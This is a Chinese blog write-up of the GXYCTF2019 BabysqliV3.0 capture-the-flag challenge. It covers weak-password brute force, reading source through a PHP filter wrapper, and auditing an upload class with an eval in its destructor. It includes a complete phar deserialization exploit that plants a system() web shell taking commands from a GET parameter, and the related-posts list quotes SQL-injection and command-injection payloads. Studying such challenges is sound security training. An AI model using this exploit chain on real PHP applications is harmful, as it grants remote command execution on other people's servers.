ctf-bbuctf-[GXYCTF2019]BabysqliV3.0具体思路复现

最新推荐文章于 2024-06-30 13:26:51 发布
最新推荐文章于 2024-06-30 13:26:51 发布
阅读量831 收藏 1
点赞数 1
分类专栏: 网络安全 文章标签: php 开发语言 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42942226/article/details/127711512
版权

目录

[GXYCTF2019]BabysqliV3.0

思路详解

 解题过程:

1.弱密码

2.伪协议

3.代码审计

[GXYCTF2019]BabysqliV3.0

思路详解

知识点:弱密码,伪协议,php反序列化

 解题过程:

1.弱密码

输入admin/任意密码,显示密码错误

bp爆破密码显示password

2.伪协议

特征:file

文件名后缀php,显示

 home/upload获取home.php和upload.php

$_GET['file']) or preg_match("/upload$/i", $_GET['file'])){
				$file = $_GET['file'].".php";
<?php
error_reporting(0);
class Uploader{
	public $Filename;
	public $cmd;
	public $token;
	

	function __construct(){
		$sandbox = getcwd()."/uploads/".md5($_SESSION['user'])."/";
		$ext = ".txt";
		@mkdir($sandbox, 0777, true);
		if(isset($_GET['name']) and !preg_match("/data:\/\/ | filter:\/\/ | php:\/\/ | \./i", $_GET['name'])){
			$this->Filename = $_GET['name'];
		}
		else{
			$this->Filename = $sandbox.$_SESSION['user'].$ext;
		}

		$this->cmd = "echo '<br><br>Master, I want to study rizhan!<br><br>';";
		$this->token = $_SESSION['user'];
	}

	function upload($file){
		global $sandbox;
		global $ext;

		if(preg_match("[^a-z0-9]", $this->Filename)){
			$this->cmd = "die('illegal filename!');";
		}
		else{
			if($file['size'] > 1024){
				$this->cmd = "die('you are too big (′▽`〃)');";
			}
			else{
				$this->cmd = "move_uploaded_file('".$file['tmp_name']."', '" . $this->Filename . "');";
			}
		}
	}

	function __toString(){
		global $sandbox;
		global $ext;
		// return $sandbox.$this->Filename.$ext;
		return $this->Filename;
	}

	function __destruct(){
		if($this->token != $_SESSION['user']){
			$this->cmd = "die('check token falied!');";
		}
		eval($this->cmd);
	}
}

if(isset($_FILES['file'])) {
	$uploader = new Uploader();
	$uploader->upload($_FILES["file"]);
	if(@file_get_contents($uploader)){
		echo "下面是你上传的文件:<br>".$uploader."<br>";
		echo file_get_contents($uploader);
	}
}

?>

代码审计

file+php=$file

function上传

路径:

/uploads/md5($_SESSION['user'])/$_SESSION['user'].$ext

 规则

反序列化:_destruct:销毁执行函数

$this->Filename = $sandbox.$_SESSION['user'].$ext;

eval($this->cmd);

文件读取:

echo file_get_contents($uploader);

利用点:

eval($this->cmd);

echo file_get_contents($uploader);

cmd=获取flag命令或者写入一句话木马命令

echo file_get_contents($uploader):

file_get_contents($uploader)读取文件:

echo:写入

文件:phar.php


<?php
 
 
class Uploader{
		public $Filename = 'aaa';
		//public $cmd ='echo phpinfo();';//可先用此测试
		public $cmd ='echo system($_GET["hack"]);';//传递一个可控hack参数
		public $token ='GXY4de07d94caf018e1453439fff2b2375b';//先上串一个合法文件得到session['user']
		
}
 
@unlink("demo.phar");
$phar = new Phar("demo.phar");//后缀名必须为phar
$phar->startBuffering();
$phar->setStub("GIF8a<?php __HALT_COMPILER();?>");
$o    = new Uploader();
$phar -> setMetadata($o);//将自定义的meta-data存入manifest
$phar -> addFromString("text.txt","test");//添加要压缩的文件
//签名自动计算
$phar -> stopBuffering();
 
?>

流程:

1.php执行文件->phar

2.上传文件保存

3.phar读取此文件序列化文件

4.定义uploader:

5.filename  token 执行_destruct  ---------$this-cmd->$cmd->echo system($_GET["hack"])

6.hack=ls

7.hack=cat flag

 

邵MD5d764ecc00b209b3b
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
[GXYCTF2019]BabySQli 解题思路&过程
iamblackcat's blog
10-19 4733
[GXYCTF2019]BabySQli 解题思路&过程
[GXYCTF2019]BabysqliV3.0 [phar]
qq_40327508的博客
11-25 1458
打开题目是登录界面,使用burp爆破出密码是password 登录 上传文件,以及url里有拼接file参数,可能有文件包含漏洞 使用php伪协议获取upload源码 <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <form action="" method="post" enctype="multipart/form-data"> 上传文件 <input type="fil
BUUCTF--[GXYCTF2019]BabysqliV3.0
qq_46263951的博客
07-23 431
开始是一个登录页面,根据提示尝试万能密码,没啥用...这里尝试了几个弱口令就可以了 admin/password 使用伪协议读取文件内容?file=php://filter/read=convert.base64-encode/resource=upload <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <form action="" method="post" enctype..
[GXYCTF2019]BabysqliV3.0
LYJ20010728的博客
05-19 924
[GXYCTF2019]BabysqliV3.0考点思路Payload预期解法非预期解法 考点 弱口令、PHP反序列化 思路 ①:题目页面提示我们应该是需要sqli注入,但是用它输入框提示的admin/password一试就进去了… ②:http://5f8d9cd4-4695-4428-acc2-b02b0e49d8d9.node3.buuoj.cn/home.php?file=upload熟悉的形式,用php伪协议读取一下文件试试; ③:预期解法:审计 upload.php 代码,$this-&g
[GXYCTF2019]BabysqliV3.0-phar反序列化正解
soldi_er的博客
06-08 498
文章目录phar反序列化漏洞利用条件构造payload文件漏洞利用参考收获   CSDN已经记录登录过程,弱口令登录,不再赘述。 phar反序列化漏洞利用条件   可以上传文件。可以执行命令的魔法函数。可以解析phar的函数,并且参数可控。   (1)upload.php可以上传文件。   (2)upload.php,具有执行命令的魔法函数。 class Uploader{ public $Filename; public $cmd; public $token; function __destr
CTF-WEB[GXYCTF 2019]BabyUpload
02-08
CTF-WEB[GXYCTF 2019]BabyUpload
CTF-misc工具2-CTF-Tools-masterV1.3.7
08-17
CTF-Tools-master是一个专注于密码编码识别与解码的工具,能自动推断密码的编码类型,并进行解码。 适用人群: 该工具主要适用于参加CTF竞赛的选手,以及对密码编码算法感兴趣的信息安全从业人员。 使用场景: 在CTF竞赛...
ctf-2017-release:BSidesSF CTF 2017版本
05-28
ctf-2017 2017 BSidesSF CTF面临的挑战 内置的 , , , , 在本地应对挑战 您可以使用docker在本地运行所有挑战。 docker-compose build && docker-compose up -d 挑战将在http://localhost:PORT提供,基于...
CTF-100题.-天天练习-学习
11-01
CTF-100题.-----------------天天练习------------------学习 100小题,试例练习
CTF-WEB入门DOC-2019版1
08-03
1. 明确自己打CTF是为了娱乐,还是为了以后的工作发展 2. 如果是为了工作,那么需要一颗非常有毅力的心 3. 做好放弃周末休息时间的准备 4. 你的绝大多数
青少年CTF——BabySQLi——Writeup
Amazingsuger的博客
01-19 495
青少年CTF——BabySQLi——WriteUp
近期CTF web
qq_61768489的博客
04-08 1272
NKCTF2023 ctfshow愚人赛 杭师大CTF
BUUCTF - web - BabySQL
1tachi的博客
11-04 248
文章目录判断注入类型判断字段数判断回显点查表查字段查数据 判断注入类型 尝试万能密码:'1 or 1=1 -- qwe 发现仅剩下1=1 -- qwe,可能ban掉了"or"关键词 尝试双写:1' oorr 1=1 -- qwe 登陆成功,可能以后都要双写了 判断字段数 1' oorrder bbyy 3 -- qwe 看来有三个字段 判断回显点 1' ununionion seselectlect 1,2,3 -- qwe 回显点是2和3 查表 1' ununionion seselectlect
BBUCTF RSA 题解
qq_73667990的博客
11-01 123
BBUCTF RSA 题解
buuctf [GXYCTF2019]BabySQli
SopRomeo的博客
03-05 6000
常规sql注入都行不通,查看源码发现一个search.php, 先说说base32 和 base64 的区别, base32 只有大写字母和数字数字组成,或者后面有三个等号。 base64 只有大写字母和数字,小写字母组成,后面一般是两个等号。 明显,那段文字是base32加密 解密后:c2VsZWN0ICogZnJvbSB1c2VyIHdoZXJlIHVzZXJuYW1lID0gJyRuYW...
GXYCTF web部分简要分析
a3320315的博客
01-25 702
0x01 ping ping ping 很明显的命令注入,我们用管道符号|即可执行我们想要的命令 空格被过滤了,绕过空格的方法有很多,比如 {cat,flag.txt} cat${IFS}flag.txt cat$IFS$9flag.txt cat<flag.txt cat<>flag.txt kg=$'\x20flag.txt'&&cat$kg (\x20转...
发布一个Yii2扩展把debug信息存储到MongoDB中
yagas的专栏
06-26 328
本项目为yii2-debug的扩展,使用MongoDB对debug数据进行存储。如果使用Yii2进行多个应用的开发的话,把debug信息汇聚到一起可以方便查阅。
ctfshow-web入门-命令执行(web66-web70)
最新发布
Welcome To Myon'Blog !
06-30 471
先使用scandir() 进行目录扫描,对于 txt 文件,我们使用 include 进行包含就可以直接看到文件内容,ini_set用来设置php.ini的值,在函数执行的时候生效,脚本结束后,设置失效。
火车头采集器Discuz采集发布模块插件
ccchen888的博客
06-26 629
Discuz论坛采集发布插件下载及使用教程说明,解决discuz门户文章,论坛帖子批量发布问题。
ctf-qsnctf此地无银三百
02-20
ctf-qsnctf是一个CTF(Capture The Flag)比赛平台,它提供了一系列的网络安全挑战,旨在帮助参与者提升网络安全技能和解决问题的能力。在ctf-qsnctf平台上,参与者可以通过解决各种类型的题目来获取旗帜(flag),并提交给平台进行验证。 "此地无银三百"是ctf-qsnctf平台上的一道题目,它的名称可能是一个提示,暗示着解题的思路具体的解题方法和答案我无法透露,因为这会破坏比赛的公平性和乐趣。如果你对这道题目感兴趣,我建议你在ctf-qsnctf平台上注册账号并参与比赛,通过自己的努力和思考来解决问题。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值